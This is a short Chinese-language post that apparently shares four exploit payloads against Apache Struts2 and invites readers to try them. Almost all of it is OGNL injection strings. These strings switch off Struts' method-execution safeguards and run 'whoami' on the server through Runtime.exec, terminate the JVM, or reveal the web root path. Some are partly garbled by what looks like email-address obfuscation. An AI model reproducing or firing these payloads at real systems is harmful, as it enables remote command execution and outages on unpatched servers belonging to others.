下面公布几个exp 有兴趣的童鞋可以去测试下,不懂的可以联系俺,共同探讨下。说不定还能发现0day.
15个漏洞及补丁自己去官网看:
https://cwiki.apache.org/confluence/display/WW/Security+Bulletins
exp1:
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1
exp 2:
?class.classLoader.jarPath=(%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]
exp3:
1${(%23_memberAccess["allowStaticMethodAccess"]=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.println(%23req.getRealPath("/")),%23k8out.close())}
exp4:
${%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d new java.lang.Boolean(false)%2c %23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c %23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew java.io.InputStreamReader(%23a)%2c%23c%3dnew java.io.BufferedReader(%23b)%2c%23d%3dnew char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close()}